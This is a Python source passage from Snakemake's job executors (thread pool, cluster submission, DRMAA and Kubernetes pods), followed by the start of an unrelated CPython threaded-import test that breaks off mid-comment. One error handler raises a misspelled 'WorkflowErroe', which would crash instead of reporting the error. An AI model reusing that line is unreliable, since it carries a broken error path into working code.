latency_wait=latency_wait) self.exec_job = '\\\n'.join(( 'cd {workflow.workdir_init} && ', '{sys.executable} -m snakemake {target} --snakefile {snakefile} ', '--force -j{cores} --keep-target-files --keep-remote ', '--attempt {attempt} ', '--force-use-threads --wrapper-prefix {workflow.wrapper_prefix} ', '--latency-wait {latency_wait} ', self.get_default_remote_provider_args(), '{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} ', '--notemp --quiet --no-hooks --nolock --mode {} '.format(Mode.subprocess))) if self.workflow.shadow_prefix: self.exec_job += " --shadow-prefix {} ".format( self.workflow.shadow_prefix) if self.workflow.use_conda: self.exec_job += " --use-conda " if self.workflow.conda_prefix: self.exec_job += " --conda-prefix {} ".format( self.workflow.conda_prefix) if self.workflow.use_singularity: self.exec_job += " --use-singularity " if self.workflow.singularity_prefix: self.exec_job += " --singularity-prefix {} ".format( self.workflow.singularity_prefix) if self.workflow.singularity_args: self.exec_job += " --singularity-args \"{}\"".format( self.workflow.singularity_args) if self.workflow.use_docker: self.exec_job += " --use-docker " #if self.workflow.singularity_prefix: # self.exec_job += " --singularity-prefix {} ".format( # self.workflow.singularity_prefix) if self.workflow.docker_args: self.exec_job += " --docker-args \"{}\"".format( self.workflow.docker_args) self.use_threads = use_threads self.cores = cores self.pool = concurrent.futures.ThreadPoolExecutor(max_workers=workers + 1) def run(self, job, callback=None, submit_callback=None, error_callback=None): super()._run(job) if job.is_group(): # the future waits for the entire group job future = self.pool.submit(self.run_group_job, job) else: future = self.run_single_job(job) future.add_done_callback(partial(self._callback, job, callback, error_callback)) def job_args_and_prepare(self, job): job.prepare() conda_env = job.conda_env_path singularity_img = job.singularity_img_path benchmark = None benchmark_repeats = job.benchmark_repeats or 1 if job.benchmark is not None: benchmark = str(job.benchmark) return (job.rule, job.input.plainstrings(), job.output.plainstrings(), job.params, job.wildcards, job.threads, job.resources, job.log.plainstrings(), benchmark, benchmark_repeats, conda_env, singularity_img, self.workflow.singularity_args, self.workflow.use_singularity, self.workflow.linemaps, self.workflow.debug, job.shadow_dir, job.jobid, job.docker_img, self.workflow.docker_args, self.workflow.use_docker) # y singularity_img is in job and not in workflow? where is job? def run_single_job(self, job): if self.use_threads or (not job.is_shadow and not job.is_run): future = self.pool.submit( run_wrapper, *self.job_args_and_prepare(job)) else: # run directive jobs are spawned into subprocesses future = self.pool.submit(self.spawn_job, job) return future def run_group_job(self, job): """Run a pipe group job. This lets all items run simultaneously.""" # we only have to consider pipe groups because in local running mode, # these are the only groups that will occur futures = [self.run_single_job(j) for j in job] while True: k = 0 for f in futures: if f.done(): ex = f.exception() if ex is not None: # kill all shell commands of the other group jobs # there can be only shell commands because the # run directive is not allowed for pipe jobs for j in job: shell.kill(j.jobid) raise ex else: k += 1 if k == len(futures): return time.sleep(1) def spawn_job(self, job): exec_job = self.exec_job cmd = self.format_job_pattern(exec_job, job=job, _quote_all=True, latency_wait=self.latency_wait) try: subprocess.check_call(cmd, shell=True) except subprocess.CalledProcessError as e: raise SpawnedJobError() def shutdown(self): self.pool.shutdown() def cancel(self): self.pool.shutdown() def _callback(self, job, callback, error_callback, future): try: ex = future.exception() if ex is not None: raise ex callback(job) except _ProcessPoolExceptions: self.handle_job_error(job) # no error callback, just silently ignore the interrupt as the main scheduler is also killed except SpawnedJobError: # don't print error message, this is done by the spawned subprocess error_callback(job) except (Exception, BaseException) as ex: self.print_job_error(job) if not (job.is_group() or job.shellcmd): print_exception(ex, self.workflow.linemaps) error_callback(job) def handle_job_success(self, job): super().handle_job_success(job) def handle_job_error(self, job): super().handle_job_error(job) job.cleanup() self.workflow.persistence.cleanup(job) class ClusterExecutor(RealExecutor): default_jobscript = "jobscript.sh" def __init__(self, workflow, dag, cores, jobname="snakejob.{name}.{jobid}.sh", printreason=False, quiet=False, printshellcmds=False, latency_wait=3, cluster_config=None, local_input=None, restart_times=None, exec_job=None, assume_shared_fs=True, max_status_checks_per_second=1): from ratelimiter import RateLimiter local_input = local_input or [] super().__init__(workflow, dag, printreason=printreason, quiet=quiet, printshellcmds=printshellcmds, latency_wait=latency_wait, assume_shared_fs=assume_shared_fs) if not self.assume_shared_fs: # use relative path to Snakefile self.snakefile = os.path.relpath(workflow.snakefile) jobscript = workflow.jobscript if jobscript is None: jobscript = os.path.join(os.path.dirname(__file__), self.default_jobscript) try: with open(jobscript) as f: self.jobscript = f.read() except IOError as e: raise WorkflowError(e) if not "jobid" in get_wildcard_names(jobname): raise WorkflowError( "Defined jobname (\"{}\") has to contain the wildcard {jobid}.") if exec_job is None: self.exec_job = '\\\n'.join(( 'cd {workflow.workdir_init} && ' if assume_shared_fs else '', '{sys.executable} ' if assume_shared_fs else 'python ', '-m snakemake {target} --snakefile {snakefile} ', '--force -j{cores} --keep-target-files --keep-remote ', '--wait-for-files {wait_for_files} --latency-wait {latency_wait} ', ' --attempt {attempt} {use_threads} ', '--wrapper-prefix {workflow.wrapper_prefix} ', '{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} ' '--nocolor --notemp --no-hooks --nolock ', '--mode {} '.format(Mode.cluster))) else: self.exec_job = exec_job if self.workflow.shadow_prefix: self.exec_job += " --shadow-prefix {} ".format( self.workflow.shadow_prefix) if self.workflow.use_conda: self.exec_job += " --use-conda " if self.workflow.conda_prefix: self.exec_job += " --conda-prefix {} ".format( self.workflow.conda_prefix) if self.workflow.use_singularity: self.exec_job += " --use-singularity " if self.workflow.singularity_prefix: self.exec_job += " --singularity-prefix {} ".format( self.workflow.singularity_prefix) if self.workflow.singularity_args: self.exec_job += " --singularity-args \"{}\"".format( self.workflow.singularity_args) if self.workflow.use_docker: self.exec_job += " --use-docker " #if self.workflow.singularity_prefix: # self.exec_job += " --singularity-prefix {} ".format( # self.workflow.singularity_prefix) if self.workflow.docker_args: self.exec_job += " --docker-args \"{}\"".format( self.workflow.docker_args) self.exec_job += self.get_default_remote_provider_args() self.jobname = jobname self._tmpdir = None self.cores = cores if cores else "" self.cluster_config = cluster_config if cluster_config else dict() self.restart_times = restart_times self.active_jobs = list() self.lock = threading.Lock() self.wait = True self.wait_thread = threading.Thread(target=self._wait_for_jobs) self.wait_thread.daemon = True self.wait_thread.start() self.max_status_checks_per_second = max_status_checks_per_second self.status_rate_limiter = RateLimiter( max_calls=self.max_status_checks_per_second, period=1) def shutdown(self): with self.lock: self.wait = False self.wait_thread.join() if not self.workflow.immediate_submit: # Only delete tmpdir (containing jobscripts) if not using # immediate_submit. With immediate_submit, jobs can be scheduled # after this method is completed. Hence we have to keep the # directory. shutil.rmtree(self.tmpdir) def cancel(self): self.shutdown() def _run(self, job, callback=None, error_callback=None): if self.assume_shared_fs: job.remove_existing_output() job.download_remote_input() super()._run(job, callback=callback, error_callback=error_callback) @property def tmpdir(self): if self._tmpdir is None: self._tmpdir = mkdtemp(dir=".snakemake", prefix="tmp.") return os.path.abspath(self._tmpdir) def get_jobscript(self, job): f = job.format_wildcards(self.jobname, cluster=self.cluster_wildcards(job)) if os.path.sep in f: raise WorkflowError("Path separator ({}) found in job name {}. " "This is not supported.".format( os.path.sep, f)) return os.path.join(self.tmpdir, f) def format_job(self, pattern, job, **kwargs): wait_for_files = [] if self.assume_shared_fs: wait_for_files.append(self.tmpdir) wait_for_files.extend(job.get_wait_for_files()) format_p = partial(self.format_job_pattern, job=job, properties=job.properties( cluster=self.cluster_params(job)), latency_wait=self.latency_wait, wait_for_files=wait_for_files, **kwargs) try: return format_p(pattern) except KeyError as e: raise WorkflowError( "Error formatting jobscript: {} not found\n" "Make sure that your custom jobscript is up to date.".format(e)) def write_jobscript(self, job, jobscript, **kwargs): # only force threads if this is not a group job # otherwise we want proper process handling use_threads = "--force-use-threads" if not job.is_group() else "" exec_job = self.format_job(self.exec_job, job, _quote_all=True, use_threads=use_threads, **kwargs) content = self.format_job(self.jobscript, job, exec_job=exec_job, **kwargs) logger.debug("Jobscript:\n{}".format(content)) with open(jobscript, "w") as f: print(content, file=f) os.chmod(jobscript, os.stat(jobscript).st_mode | stat.S_IXUSR) def cluster_params(self, job): """Return wildcards object for job from cluster_config.""" cluster = self.cluster_config.get("__default__", dict()).copy() cluster.update(self.cluster_config.get(job.name, dict())) # Format values with available parameters from the job. for key, value in list(cluster.items()): if isinstance(value, str): try: cluster[key] = job.format_wildcards(value) except NameError as e: if job.is_group(): msg = ("Failed to format cluster config for group job. " "You have to ensure that your default entry " "does not contain any items that group jobs " "cannot provide, like {rule}, {wildcards}.") else: msg = ("Failed to format cluster config " "entry for job {}.".format(job.rule.name)) raise WorkflowError(msg, e) return cluster def cluster_wildcards(self, job): return Wildcards(fromdict=self.cluster_params(job)) def handle_job_success(self, job): super().handle_job_success(job, upload_remote=False, handle_log=False, handle_touch=False) def handle_job_error(self, job): # TODO what about removing empty remote dirs?? This cannot be decided # on the cluster node. super().handle_job_error(job, upload_remote=False) logger.debug("Cleanup job metadata.") # We have to remove metadata here as well. # It will be removed by the CPUExecutor in case of a shared FS, # but we might not see the removal due to filesystem latency. # By removing it again, we make sure that it is gone on the host FS. self.workflow.persistence.cleanup(job) def print_cluster_job_error(self, job_info, jobid): job = job_info.job kind = "rule {}".format(job.rule.name) if not job.is_group else "group job {}".format(job.groupid) logger.error("Error executing {} on cluster (jobid: {}, external: " "{}, jobscript: {}). For error details see the cluster " "log and the log files of the involved rule(s).".format(kind, jobid, job_info.jobid, job_info.jobscript)) GenericClusterJob = namedtuple("GenericClusterJob", "job jobid callback error_callback jobscript jobfinished jobfailed") class GenericClusterExecutor(ClusterExecutor): def __init__(self, workflow, dag, cores, submitcmd="qsub", statuscmd=None, cluster_config=None, jobname="snakejob.{rulename}.{jobid}.sh", printreason=False, quiet=False, printshellcmds=False, latency_wait=3, restart_times=0, assume_shared_fs=True, max_status_checks_per_second=1): self.submitcmd = submitcmd if not assume_shared_fs and statuscmd is None: raise WorkflowError("When no shared filesystem can be assumed, a " "status command must be given.") self.statuscmd = statuscmd self.external_jobid = dict() super().__init__(workflow, dag, cores, jobname=jobname, printreason=printreason, quiet=quiet, printshellcmds=printshellcmds, latency_wait=latency_wait, cluster_config=cluster_config, restart_times=restart_times, assume_shared_fs=assume_shared_fs, max_status_checks_per_second=max_status_checks_per_second) if statuscmd: self.exec_job += ' && exit 0 || exit 1' elif assume_shared_fs: # TODO wrap with watch and touch {jobrunning} # check modification date of {jobrunning} in the wait_for_job method self.exec_job += ' && touch "{jobfinished}" || (touch "{jobfailed}"; exit 1)' else: raise WorkflowError("If no shared filesystem is used, you have to " "specify a cluster status command.") def cancel(self): logger.info("Will exit after finishing currently running jobs.") self.shutdown() def register_job(self, job): # Do not register job here. # Instead do it manually once the jobid is known. pass def run(self, job, callback=None, submit_callback=None, error_callback=None): super()._run(job) workdir = os.getcwd() jobid = job.jobid jobscript = self.get_jobscript(job) jobfinished = os.path.join(self.tmpdir, "{}.jobfinished".format(jobid)) jobfailed = os.path.join(self.tmpdir, "{}.jobfailed".format(jobid)) self.write_jobscript(job, jobscript, jobfinished=jobfinished, jobfailed=jobfailed) if self.statuscmd: ext_jobid = self.dag.incomplete_external_jobid(job) if ext_jobid: # Job is incomplete and still running. # We simply register it and wait for completion or failure. logger.info( "Resuming incomplete job {} with external jobid '{}'.".format( jobid, ext_jobid)) submit_callback(job) with self.lock: self.active_jobs.append( GenericClusterJob(job, ext_jobid, callback, error_callback, jobscript, jobfinished, jobfailed)) return deps = " ".join(self.external_jobid[f] for f in job.input if f in self.external_jobid) try: submitcmd = job.format_wildcards( self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)) except AttributeError as e: raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None) try: ext_jobid = subprocess.check_output( '{submitcmd} "{jobscript}"'.format(submitcmd=submitcmd, jobscript=jobscript), shell=True).decode().split("\n") except subprocess.CalledProcessError as ex: logger.error("Error submitting jobscript (exit code {}):\n{}".format( ex.returncode, ex.output.decode())) error_callback(job) return if ext_jobid and ext_jobid[0]: ext_jobid = ext_jobid[0] self.external_jobid.update((f, ext_jobid) for f in job.output) logger.info("Submitted {} {} with external jobid '{}'.".format( "group job" if job.is_group() else "job", jobid, ext_jobid)) self.workflow.persistence.started( job, external_jobid=ext_jobid) submit_callback(job) with self.lock: self.active_jobs.append(GenericClusterJob( job, ext_jobid, callback, error_callback, jobscript, jobfinished, jobfailed)) def _wait_for_jobs(self): success = "success" failed = "failed" running = "running" if self.statuscmd is not None: def job_status(job): try: # this command shall return "success", "failed" or "running" return subprocess.check_output( '{statuscmd} {jobid}'.format(jobid=job.jobid, statuscmd=self.statuscmd), shell=True).decode().split("\n")[0] except subprocess.CalledProcessError as e: if e.returncode < 0: # Ignore SIGINT and all other issues due to signals # because it will be caused by hitting e.g. # Ctrl-C on the main process or sending killall to # snakemake. # Snakemake will handle the signal in # the master process. pass else: raise WorkflowError("Failed to obtain job status. " "See above for error message.") else: def job_status(job): if os.path.exists(active_job.jobfinished): os.remove(active_job.jobfinished) os.remove(active_job.jobscript) return success if os.path.exists(active_job.jobfailed): os.remove(active_job.jobfailed) os.remove(active_job.jobscript) return failed return running while True: with self.lock: if not self.wait: return active_jobs = self.active_jobs self.active_jobs = list() still_running = list() logger.debug("Checking status of {} jobs.".format(len(active_jobs))) for active_job in active_jobs: with self.status_rate_limiter: status = job_status(active_job) if status == success: active_job.callback(active_job.job) elif status == failed: self.print_job_error( active_job.job, cluster_jobid=active_job.jobid if active_job.jobid else "unknown", ) self.print_cluster_job_error( active_job, self.dag.jobid(active_job.job)) active_job.error_callback(active_job.job) else: still_running.append(active_job) with self.lock: self.active_jobs.extend(still_running) sleep() SynchronousClusterJob = namedtuple("SynchronousClusterJob", "job jobid callback error_callback jobscript process") class SynchronousClusterExecutor(ClusterExecutor): """ invocations like "qsub -sync y" (SGE) or "bsub -K" (LSF) are synchronous, blocking the foreground thread and returning the remote exit code at remote exit. """ def __init__(self, workflow, dag, cores, submitcmd="qsub", cluster_config=None, jobname="snakejob.{rulename}.{jobid}.sh", printreason=False, quiet=False, printshellcmds=False, latency_wait=3, restart_times=0, assume_shared_fs=True): super().__init__(workflow, dag, cores, jobname=jobname, printreason=printreason, quiet=quiet, printshellcmds=printshellcmds, latency_wait=latency_wait, cluster_config=cluster_config, restart_times=restart_times, assume_shared_fs=assume_shared_fs, max_status_checks_per_second=10) self.submitcmd = submitcmd self.external_jobid = dict() def cancel(self): logger.info("Will exit after finishing currently running jobs.") self.shutdown() def run(self, job, callback=None, submit_callback=None, error_callback=None): super()._run(job) workdir = os.getcwd() jobid = job.jobid jobscript = self.get_jobscript(job) self.write_jobscript(job, jobscript) deps = " ".join(self.external_jobid[f] for f in job.input if f in self.external_jobid) try: submitcmd = job.format_wildcards( self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)) except AttributeError as e: raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None) process = subprocess.Popen('{submitcmd} "{jobscript}"'.format(submitcmd=submitcmd, jobscript=jobscript), shell=True) submit_callback(job) with self.lock: self.active_jobs.append(SynchronousClusterJob( job, process.pid, callback, error_callback, jobscript, process)) def _wait_for_jobs(self): while True: with self.lock: if not self.wait: return active_jobs = self.active_jobs self.active_jobs = list() still_running = list() for active_job in active_jobs: with self.status_rate_limiter: exitcode = active_job.process.poll() if exitcode is None: # job not yet finished still_running.append(active_job) elif exitcode == 0: # job finished successfully os.remove(active_job.jobscript) active_job.callback(active_job.job) else: # job failed os.remove(active_job.jobscript) self.print_job_error(active_job.job) self.print_cluster_job_error( active_job, self.dag.jobid(active_job.job)) active_job.error_callback(active_job.job) with self.lock: self.active_jobs.extend(still_running) sleep() DRMAAClusterJob = namedtuple("DRMAAClusterJob", "job jobid callback error_callback jobscript") class DRMAAExecutor(ClusterExecutor): def __init__(self, workflow, dag, cores, jobname="snakejob.{rulename}.{jobid}.sh", printreason=False, quiet=False, printshellcmds=False, drmaa_args="", drmaa_log_dir=None, latency_wait=3, cluster_config=None, restart_times=0, assume_shared_fs=True, max_status_checks_per_second=1): super().__init__(workflow, dag, cores, jobname=jobname, printreason=printreason, quiet=quiet, printshellcmds=printshellcmds, latency_wait=latency_wait, cluster_config=cluster_config, restart_times=restart_times, assume_shared_fs=assume_shared_fs, max_status_checks_per_second=max_status_checks_per_second) try: import drmaa except ImportError: raise WorkflowError( "Python support for DRMAA is not installed. " "Please install it, e.g. with easy_install3 --user drmaa") except RuntimeError as e: raise WorkflowError("Error loading drmaa support:\n{}".format(e)) self.session = drmaa.Session() self.drmaa_args = drmaa_args self.drmaa_log_dir = drmaa_log_dir self.session.initialize() self.submitted = list() def cancel(self): from drmaa.const import JobControlAction from drmaa.errors import InvalidJobException, InternalException for jobid in self.submitted: try: self.session.control(jobid, JobControlAction.TERMINATE) except (InvalidJobException, InternalException): #This is common - logging a warning would probably confuse the user. pass self.shutdown() def run(self, job, callback=None, submit_callback=None, error_callback=None): super()._run(job) jobscript = self.get_jobscript(job) self.write_jobscript(job, jobscript) try: drmaa_args = job.format_wildcards( self.drmaa_args, cluster=self.cluster_wildcards(job)) except AttributeError as e: raise WorkflowError(str(e), rule=job.rule) import drmaa if self.drmaa_log_dir: makedirs(self.drmaa_log_dir) try: jt = self.session.createJobTemplate() jt.remoteCommand = jobscript jt.nativeSpecification = drmaa_args if self.drmaa_log_dir: jt.outputPath = ":" + self.drmaa_log_dir jt.errorPath = ":" + self.drmaa_log_dir jt.jobName = os.path.basename(jobscript) jobid = self.session.runJob(jt) except (drmaa.DeniedByDrmException, drmaa.InternalException, drmaa.InvalidAttributeValueException) as e: print_exception(WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps) error_callback(job) return logger.info("Submitted DRMAA job {} with external jobid {}.".format(job.jobid, jobid)) self.submitted.append(jobid) self.session.deleteJobTemplate(jt) submit_callback(job) with self.lock: self.active_jobs.append(DRMAAClusterJob( job, jobid, callback, error_callback, jobscript)) def shutdown(self): super().shutdown() self.session.exit() def _wait_for_jobs(self): import drmaa while True: with self.lock: if not self.wait: return active_jobs = self.active_jobs self.active_jobs = list() still_running = list() for active_job in active_jobs: with self.status_rate_limiter: try: retval = self.session.wait(active_job.jobid, drmaa.Session.TIMEOUT_NO_WAIT) except drmaa.ExitTimeoutException as e: # job still active still_running.append(active_job) continue except (drmaa.InternalException, Exception) as e: print_exception(WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps) os.remove(active_job.jobscript) active_job.error_callback(active_job.job) continue # job exited os.remove(active_job.jobscript) if not retval.wasAborted and retval.hasExited and retval.exitStatus == 0: active_job.callback(active_job.job) else: self.print_job_error(active_job.job) self.print_cluster_job_error( active_job, self.dag.jobid(active_job.job)) active_job.error_callback(active_job.job) with self.lock: self.active_jobs.extend(still_running) sleep() @contextlib.contextmanager def change_working_directory(directory=None): """ Change working directory in execution context if provided. """ if directory: try: saved_directory = os.getcwd() logger.info("Changing to shadow directory: {}".format(directory)) os.chdir(directory) yield finally: os.chdir(saved_directory) else: yield KubernetesJob = namedtuple("KubernetesJob", "job jobid callback error_callback kubejob jobscript") class KubernetesExecutor(ClusterExecutor): def __init__(self, workflow, dag, namespace, envvars, container_image=None, jobname="{rulename}.{jobid}", printreason=False, quiet=False, printshellcmds=False, latency_wait=3, cluster_config=None, local_input=None, restart_times=None): exec_job = ( 'cp -rf /source/. . && ' 'snakemake {target} --snakefile {snakefile} ' '--force -j{cores} --keep-target-files --keep-remote ' '--latency-wait 0 ' ' --attempt {attempt} {use_threads} ' '--wrapper-prefix {workflow.wrapper_prefix} ' '{overwrite_config} {printshellcmds} {rules} --nocolor ' '--notemp --no-hooks --nolock ') super().__init__(workflow, dag, None, jobname=jobname, printreason=printreason, quiet=quiet, printshellcmds=printshellcmds, latency_wait=latency_wait, cluster_config=cluster_config, local_input=local_input, restart_times=restart_times, exec_job=exec_job, assume_shared_fs=False, max_status_checks_per_second=10) # use relative path to Snakefile self.snakefile = os.path.relpath(workflow.snakefile) try: from kubernetes import config except ImportError: raise WorkflowError("The Python 3 package 'kubernetes' " "must be installed to use Kubernetes") config.load_kube_config() import kubernetes.client self.kubeapi = kubernetes.client.CoreV1Api() self.batchapi = kubernetes.client.BatchV1Api() self.namespace = namespace self.envvars = envvars or [] self.secret_files = {} self.run_namespace = str(uuid.uuid4()) self.secret_envvars = {} self.register_secret() self.container_image = ( container_image or get_container_image()) def register_secret(self): import kubernetes.client secret = kubernetes.client.V1Secret() secret.metadata = kubernetes.client.V1ObjectMeta() # create a random uuid secret.metadata.name = self.run_namespace secret.type = "Opaque" secret.data = {} for i, f in enumerate(self.workflow.get_sources()): if f.startswith(".."): logger.warning("Ignoring source file {}. Only files relative " "to the working directory are allowed.".format(f)) continue with open(f, "br") as content: key = "f{}".format(i) self.secret_files[key] = f secret.data[key] = base64.b64encode(content.read()).decode() for e in self.envvars: try: key = e.lower() secret.data[key] = base64.b64encode(os.environ[e].encode()).decode() self.secret_envvars[key] = e except KeyError: continue self.kubeapi.create_namespaced_secret(self.namespace, secret) def unregister_secret(self): import kubernetes.client self.kubeapi.delete_namespaced_secret(self.run_namespace, self.namespace, body=kubernetes.client.V1DeleteOptions()) def shutdown(self): self.unregister_secret() super().shutdown() def cancel(self): import kubernetes.client body = kubernetes.client.V1DeleteOptions() with self.lock: for j in self.active_jobs: self.kubeapi.delete_namespaced_pod( j.jobid, self.namespace, body=body) self.shutdown() def run(self, job, callback=None, submit_callback=None, error_callback=None): import kubernetes.client super()._run(job) exec_job = self.format_job( self.exec_job, job, _quote_all=True, use_threads="--force-use-threads" if not job.is_group() else "") # Kubernetes silently does not submit a job if the name is too long # therefore, we ensure that it is not longer than snakejob+uuid. jobid = "snakejob-{}".format( get_uuid("{}-{}-{}".format( self.run_namespace, job.jobid, job.attempt))) body = kubernetes.client.V1Pod() body.metadata = kubernetes.client.V1ObjectMeta(labels={"app": "snakemake"}) body.metadata.name = jobid # container container = kubernetes.client.V1Container(name=jobid) container.image = self.container_image container.command = shlex.split("/bin/sh") container.args = ["-c", exec_job] container.working_dir = "/workdir" container.volume_mounts = [kubernetes.client.V1VolumeMount( name="workdir", mount_path="/workdir")] container.volume_mounts = [kubernetes.client.V1VolumeMount( name="source", mount_path="/source")] body.spec = kubernetes.client.V1PodSpec(containers=[container]) # fail on first error body.spec.restart_policy = "Never" # source files as a secret volume # we copy these files to the workdir before executing Snakemake too_large = [path for path in self.secret_files.values() if os.path.getsize(path) > 1000000] if too_large: raise WorkflowError("The following source files exceed the maximum " "file size (1MB) that can be passed from host to " "kubernetes. These are likely not source code " "files. Consider adding them to your " "remote storage instead or (if software) use " "Conda packages or container images:\n{}".format( "\n".join(too_large))) secret_volume = kubernetes.client.V1Volume(name="source") secret_volume.secret = kubernetes.client.V1SecretVolumeSource() secret_volume.secret.secret_name = self.run_namespace secret_volume.secret.items = [ kubernetes.client.V1KeyToPath(key=key, path=path) for key, path in self.secret_files.items() ] # workdir as an emptyDir volume of undefined size workdir_volume = kubernetes.client.V1Volume(name="workdir") workdir_volume.empty_dir = kubernetes.client.V1EmptyDirVolumeSource() body.spec.volumes = [secret_volume, workdir_volume] # env vars container.env = [] for key, e in self.secret_envvars.items(): envvar = kubernetes.client.V1EnvVar(name=e) envvar.value_from = kubernetes.client.V1EnvVarSource() envvar.value_from.secret_key_ref = kubernetes.client.V1SecretKeySelector( key=key, name=self.run_namespace) container.env.append(envvar) # request resources container.resources = kubernetes.client.V1ResourceRequirements() container.resources.requests = {} # Subtract 1 from the requested number of cores. # The reason is that kubernetes requires some cycles for # maintenance, but won't use a full core for that. # This way, we should be able to saturate the node without exceeding it # too much. container.resources.requests["cpu"] = job.resources["_cores"] - 1 if "mem_mb" in job.resources.keys(): container.resources.requests["memory"] = "{}M".format( job.resources["mem_mb"]) # capabilities if job.needs_singularity and self.workflow.use_singularity: # TODO this should work, but it doesn't currently because of # missing loop devices # singularity inside docker requires SYS_ADMIN capabilities # see https://groups.google.com/a/lbl.gov/forum/#!topic/singularity/e9mlDuzKowc # container.capabilities = kubernetes.client.V1Capabilities() # container.capabilities.add = ["SYS_ADMIN", # "DAC_OVERRIDE", # "SETUID", # "SETGID", # "SYS_CHROOT"] # Running in priviledged mode always works container.security_context = kubernetes.client.V1SecurityContext( privileged=True) pod = self._kubernetes_retry( lambda: self.kubeapi.create_namespaced_pod(self.namespace, body)) logger.info("Get status with:\n" "kubectl describe pod {jobid}\n" "kubectl logs {jobid}".format(jobid=jobid)) self.active_jobs.append(KubernetesJob( job, jobid, callback, error_callback, pod, None)) def _kubernetes_retry(self, func): import kubernetes with self.lock: try: return func() except kubernetes.client.rest.ApiException as e: if e.status == 401: # Unauthorized. # Reload config in order to ensure token is # refreshed. Then try again. logger.info("trying to reauthenticate") kubernetes.config.load_kube_config() subprocess.run(['kubectl','get','nodes']) self.kubeapi = kubernetes.client.CoreV1Api() self.batchapi = kubernetes.client.BatchV1Api() self.register_secret() try: return func() except kubernetes.client.rest.ApiException as e: # Both attempts failed, raise error. raise WorkflowError(e, "This is likely a bug in " "https://github.com/kubernetes-client/python.") #Handling timeout that may occur in case of GKE master upgrade except urllib3.exceptions.MaxRetryError as e: logger.info( "Request time out! " "check your connection to Kubernetes master" "Workflow will pause for 5 minutes to allow any update operations to complete") time.sleep (300) try: return func() except: #Still can't reach the server after 5 minutes raise WorkflowErroe(e, "Error 111 connection timeout, please check" " that the k8 cluster master is reachable!") def _wait_for_jobs(self): import kubernetes while True: with self.lock: if not self.wait: return active_jobs = self.active_jobs self.active_jobs = list() still_running = list() for j in active_jobs: with self.status_rate_limiter: logger.debug("Checking status for pod {}".format(j.jobid)) job_not_found = False try: res = self._kubernetes_retry( lambda: self.kubeapi.read_namespaced_pod_status(j.jobid, self.namespace)) except kubernetes.client.rest.ApiException as e: if e.status == 404: # Jobid not found # The job is likely already done and was deleted on # the server. j.callback(j.job) continue except WorkflowError as e: print_exception(e, self.workflow.linemaps) j.error_callback(j.job) continue if res is None: msg = ("Unknown pod {jobid}. " "Has the pod been deleted " "manually?").format(jobid=j.jobid) self.print_job_error(j.job, msg=msg, jobid=j.jobid) j.error_callback(j.job) elif res.status.phase == "Failed": msg = ("For details, please issue:\n" "kubectl describe pod {jobid}\n" "kubectl logs {jobid}").format(jobid=j.jobid) # failed self.print_job_error(j.job, msg=msg, jobid=j.jobid) j.error_callback(j.job) elif res.status.phase == "Succeeded": # finished j.callback(j.job) else: # still active still_running.append(j) with self.lock: self.active_jobs.extend(still_running) sleep() def run_wrapper(job_rule, input, output, params, wildcards, threads, resources, log, benchmark, benchmark_repeats, conda_env, singularity_img, singularity_args, use_singularity, linemaps, debug, shadow_dir, jobid, docker_img, docker_args, use_docker): """ Wrapper around the run method that handles exceptions and benchmarking. Arguments job_rule -- the ``job.rule`` member input -- list of input files output -- list of output files wildcards -- so far processed wildcards threads -- usable threads log -- list of log files shadow_dir -- optional shadow directory root """ # get shortcuts to job_rule members run = job_rule.run_func version = job_rule.version rule = job_rule.name is_shell = job_rule.shellcmd is not None if os.name == "posix" and debug: sys.stdin = open('/dev/stdin') if benchmark is not None: from snakemake.benchmark import BenchmarkRecord, benchmarked, write_benchmark_records # Change workdir if shadow defined and not using singularity. # Otherwise, we do the change from inside the container. passed_shadow_dir = None if use_singularity: passed_shadow_dir = shadow_dir shadow_dir = None try: with change_working_directory(shadow_dir): if benchmark: bench_records = [] for bench_iteration in range(benchmark_repeats): # Determine whether to benchmark this process or do not # benchmarking at all. We benchmark this process unless the # execution is done through the ``shell:``, ``script:``, or # ``wrapper:`` stanza. is_sub = (job_rule.shellcmd or job_rule.script or job_rule.wrapper or job_rule.cwl) if is_sub: # The benchmarking through ``benchmarked()`` is started # in the execution of the shell fragment, script, wrapper # etc, as the child PID is available there. bench_record = BenchmarkRecord() run(input, output, params, wildcards, threads, resources, log, version, rule, conda_env, singularity_img, singularity_args, use_singularity, docker_img, docker_args, use_docker, bench_record, jobid, is_shell, bench_iteration, passed_shadow_dir) else: # The benchmarking is started here as we have a run section # and the generated Python function is executed in this # process' thread. with benchmarked() as bench_record: run(input, output, params, wildcards, threads, resources, log, version, rule, conda_env, singularity_img, singularity_args, use_singularity, docker_img, docker_args, use_docker, bench_record, jobid, is_shell, bench_iteration, passed_shadow_dir) # Store benchmark record for this iteration bench_records.append(bench_record) else: run(input, output, params, wildcards, threads, resources, log, version, rule, conda_env, singularity_img, singularity_args, use_singularity, docker_img, docker_args, use_docker, None, jobid, is_shell, None, passed_shadow_dir) except (KeyboardInterrupt, SystemExit) as e: # Re-raise the keyboard interrupt in order to record an error in the # scheduler but ignore it raise e except (Exception, BaseException) as ex: log_verbose_traceback(ex) # this ensures that exception can be re-raised in the parent thread lineno, file = get_exception_origin(ex, linemaps) raise RuleException(format_error(ex, lineno, linemaps=linemaps, snakefile=file, show_traceback=True)) if benchmark is not None: try: write_benchmark_records(bench_records, benchmark) except (Exception, BaseException) as ex: raise WorkflowError(ex)
test_threaded_import.py
# This is a variant of the very old (early 90's) file # Demo/threads/bug.py. It simply provokes a number of threads into # trying to import the same module "at the same time". # There are no pleasant failure modes -- most likely is that Python # complains several times about module random having no attribute # randrange, and then Python hangs. import _imp as imp import os import importlib import sys import time import shutil import threading import unittest from unittest import mock from test.support import (verbose, run_unittest) from test.support.import_helper import forget from test.support.os_helper import (TESTFN, unlink, rmtree) from test.support import threading_helper def task(N, done, done_tasks, errors): try: # We don't use modulefinder but still import it in order to stress # importing of different modules from several threads. if len(done_tasks) % 2: import modulefinder import random else: import random import modulefinder # This will fail if random is not completely initialized x = random.randrange(1, 3) except Exception as e: errors.append(e.with_traceback(None)) finally: done_tasks.append(threading.get_ident()) finished = len(done_tasks) == N if finished: done.set() def mock_register_at_fork(func): # bpo-30599: Mock os.register_at_fork() when importing the random module, # since this function 